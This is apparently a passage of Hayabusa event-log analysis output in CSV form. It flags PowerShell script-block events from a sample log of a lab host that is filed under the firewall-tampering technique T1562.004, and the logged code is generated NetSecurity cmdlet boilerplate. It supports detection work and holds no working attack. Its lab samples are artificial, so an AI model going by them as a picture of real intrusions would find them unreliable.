[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = 
${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { 
[object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
